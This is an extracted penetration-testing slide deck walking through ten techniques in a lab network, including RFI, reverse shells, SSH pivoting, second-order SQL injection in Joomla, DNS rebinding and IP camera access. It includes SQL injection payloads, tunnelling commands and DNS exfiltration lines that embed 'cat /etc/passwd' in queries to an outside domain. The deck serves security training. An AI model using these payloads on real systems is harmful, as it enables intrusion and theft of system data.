The document discusses 10 hacking techniques from easy to difficult, including: Server Side Request Forgery (SSRF), Remote File Inclusion (RFI), privilege escalation through weak passwords, pivoting using SSH tunneling, SQL injection second order, local file inclusion to remote command execution (LFI to RCE), exfiltrating data via DNS requests, exploiting network devices, DNS rebinding, and gaining access to unsecured IP cameras. The techniques are demonstrated through proofs of concept on a sample network environment and potential vulnerabilities are highlighted on each target.

1. 10 ท่ายาก
จาก Hacking Labs
M a n i c h K o o m s u s i
OSCP, OSCE, GXPN
P o n g t o r n A n g s u c h o t m e t e e
OSCP

2. TODAYS AGENDA
10 techniques from hacking labs and real world
Implement to test environment
From easy to difficult
Go through one by one, explain and PoC

3. Network Diagram
Attacker
10.10.11.100
192.168.10.100 192.168.10.101
10.10.11.101
192.168.20.100 192.168.20.101
192.168.30.100
192.168.30.101

4. SSRF : Server Site Request Forgery
RFI : Remote File Inclusion
+

5. SSRF : Server Site Request Forgery

6. What does the SSRF do?
Internal port scanning
Access resources on internal network
Etc.

7. SSRF Proof of Concept
Attacker
10.10.11.100
192.168.10.100 192.168.10.101
10.10.11.101
192.168.20.100 192.168.20.101
192.168.30.100
192.168.30.101

8. bWAPP

9. 10.10.11.101/bWAPP/bWAPP/rlfi.php?language=lang_en.php?actipy=go

10. << Local File Inclusion
Remote File Inclusion >>

11. Malicious File on Attacker host
IP as a parameter
Port list

12. Load File From Attacker Host & Execute on target machine

13. Try to scan another internal host
Attacker
10.10.11.100
192.168.10.100 192.168.10.101
10.10.11.101
192.168.20.100 192.168.20.101
192.168.30.100
192.168.30.101

14. Try to scan another internal host

15. PHP Reverse shell
+
RFI Remote File Inclusion

16. Remote File Inclusion

17. Malicious file on Attacker host
Listen on port 1234

18. Exploit
<< Brows to attacker file
Gain access >>

19. Privilege Escalation (Weak Password)
Try to switch to “ubuntu” user
Password is same as username

20. Network Diagram
Attacker
10.10.11.100
192.168.10.100 192.168.10.101
10.10.11.101
192.168.20.100 192.168.20.101
192.168.30.100
192.168.30.101

21. Pivoting

22. SSH Tunneling to 192.168.10.101
Attacker
10.10.11.100
192.168.10.100 192.168.10.101
10.10.11.101
192.168.20.100 192.168.20.101
192.168.30.100
192.168.30.101

23. Local SSH Tunneling
192.168.20.101 : 8010.10.11.101
127.0.0.1 : 8080
ssh ubuntu@10.10.11.101 –L 8080:192.168.10.101:80

24. Local SSH Tunneling
http://127.0.0.1:8080 è http://192.168.10.101

25. Remote SSH Tunneling
192.168.20.1020.0.0.0:444410.10.11.100:4444
ssh ubuntu@10.10.11.101 –R *:4444:10.10.11.100:4444
192.168.20.101
192.168.20.103

26. Remote SSH Tunneling
192.168.20.102
0.0.0.0:444410.10.11.100:4444
ssh ubuntu@10.10.11.101 –R *:4444:10.10.11.100:4444
192.168.20.101
192.168.20.103

27. Remote SSH Tunneling
echo “GatewayPorts yes” >> /etc/ssh/sshd_config

28. Remote SSH Tunneling

29. 1st Pivot
192.168.10.101:80
10.10.11.100:4444
0.0.0.0:4444
127.0.0.1:8080

30. SQL Injection Second Order

31. SQL Injection Second Order
‘ or 1=1 -- -
SELECT * FROM users WHERE username=‘’ or 1=1-- - and password=‘P@ssw0rd’;

32. SQL Injection Second Order
Attacker injects payload
The payload will be executed when affected has
been called

33. SQLi Second Order (1st stage )
username password
admin P@ssw0rd
INSERT INTO database VALUES(“admin’-- -”,”password”);
username password
admin P@ssw0rd
admin’-- - password

34. username password
admin P@ssw0rd
admin’-- - password
UPDATE users SET password=‘newpassword’ WHERE username=‘admin’-- -’;
username password
admin newpassword
admin’-- - password
SQLi Second Order (2nd stage )

35. Network Diagram
192.168.10.101:80
10.10.11.100:4444
0.0.0.0:4444
127.0.0.1:8080

36. Login as normal user

37. Login as normal user

38. On Edit Account page

39. The issue parameter

40. SQL Injection Second Order
Inject a single quote into the jform[params][admin_style]
Item has been saved

41. SQL Injection Second Order
Browse to http://127.0.0.1:8080/joomla/administrator/index.php

42. SQL Injection Second Order
Browse to http://127.0.0.1:8080/joomla/administrator/index.php
Inject AND sleep(5);-- - into the jform[params][admin_style]

43. SQL Injection Second Order
administrator/templates/hathor/postinstall/hathormessage.php
$adminstyle[0]

44. SQL Injection Second Order
Inject AND sleep(5);-- - into the jform[params][admin_style][0]
Browse to http://127.0.0.1:8080/joomla/administrator/index.php

45. SQL Injection Second Order
Inject payload into the jform[params][admin_style][0]
Browse to http://127.0.0.1:8080/joomla/administrator/index.php
Get root user’s session

46. SQL Injection Second Order
<< Logout
Set root session >>

47. SQL Injection Second Order
<< Super User now

48. PHP Reverse shell (2)

49. PHP Reverse shell (2)

50. PHP Reverse shell (2)
<< Reverse shell code
Listening on port 4444 >>

51. 192.168.10.101:80
10.10.11.100:4444
0.0.0.0:4444
127.0.0.1:8080
SQL Injection Second Order
192.168.10.100

52. PHP Reverse shell (2)
<< Exploit
Gain access >>

53. Privilege Escalation
(Path Environment)

54. Can you escalate yourself from here?

55. More information

56. The vulnerability

57. What dose Linux do for calling binary file

58. Generate malicious file
Generate malicious file name “scp”

59. Pivoting

60. 192.168.10.101:80
10.10.11.100:4444
0.0.0.0:4444
127.0.0.1:8080
Pivoting
10.10.11.100:80
0.0.0.0:80

61. Download file

62. Path environment setting

63. Exploit

64. LFI to RCE ( PHP session )

65. 192.168.10.101:80
10.10.11.100:4444
0.0.0.0:4444
127.0.0.1:8080
LFI to RCE

66. Pivoting (pre-stage)
Add user
Set config for allowing on 0.0.0.0

67. LFI to RCE
Pivoting

68. 192.168.10.101:80
10.10.11.100:4444
0.0.0.0:4444
127.0.0.1:8080
0.0.0.0:2280 192.168.20.101:80
LFI to RCE

69. Exfiltrating Data Via DNS Requests

70. Pivoting (forward)
SSH tunneling
Try to communicate with target

71. Pivoting (reverse)

72. 192.168.10.101:80
10.10.11.100:4444
0.0.0.0:4444
127.0.0.1:8080
0.0.0.0:2280 192.168.20.101:80
0.0.0.0:2281 192.168.20.101:8081
0.0.0.0:4444
Exfiltrating Via DNS

73. Exfiltrating Via DNS
Victim IP = 192.168.1.13 PORT 7001

74. Payload ==> “bash -c dig$IFS`uname$IFS-a`.snoopbeeslab.org”
Exfiltrating Via DNS

75. Exfiltrating Via DNS

76. Payload ==> “bash -c dig$IFS`cat$IFS/etc/passwd`.snoopbeeslab.org”
Exfiltrating Via DNS

77. Exfiltrating Via DNS

78. Exploiting The Network Device

79. Exploiting The Network Device
Before attack

80. Exploiting The Network Device
After attack

81. Exploiting The Network Device

82. Exploiting The Network Device
Information Gatherings

83. Exploiting The Network Device
Setup Weapon

84. Exploiting The Network Device
Spoof IP “10.200.0.222”

85. Exploiting The Network Device

86. Exploiting The Network Device
Add Config

87. Exploiting The Network Device

88. Exploiting The Network Device

89. Exploiting The Network Device

90. DNS Rebinding

91. Config DNS
Attacker
10.10.11.100
192.168.10.100 192.168.10.101
10.10.11.101 192.168.30.254
192.168.30.101
192.168.1.100

92. DNS Configuration

93. Victim DNS Query

94. Malicious File on attacker server
Try to access file in browser cache
Submit result to attacker server

95. Attacker Server Configuration
Start web service
Listening traffic on port 53 or any port

96. attacker.com = 10.10.11.100

97. Attacker down the web site

98. attacker.com = 192.168.1.100

99. Gain sensitive data

100. IP Camera

101. IP Camera Security
- Brute force username password
- Default Password
- Backdoor from manufacturer
- Gain unique id from the same network and brute force password

102. IP Camera Security
Device id : XXXX69XXXXWSXXX
Wifi_ssid : missconf4
Wifi_wpa_psk : P@ssw0rd
Username : admin
Password : P@ssw0rd
*We only need Device ID and Password
for remote login

103. Remote Login
Attacker
10.10.11.100
192.168.30.100
192.168.1.101
192.168.30.254
DVS own by attacker
192.168.1.x

104. CONCLUSION

105. References
https://miki.it/blog/2015/4/20/the-power-of-dns-rebinding-stealing-wifi-passwords-with-a-website/
https://blog.ripstech.com/2018/joomla-privilege-escalation-via-sql-injection/
https://github.com/NickstaDB/DeserLab
http://resources.infosecinstitute.com/the-ssrf-vulnerability/#gref
https://www.fontenay-ronan.fr/c7824wip-security-review/
https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
http://www.itsecgames.com/
https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

106. THANK YOU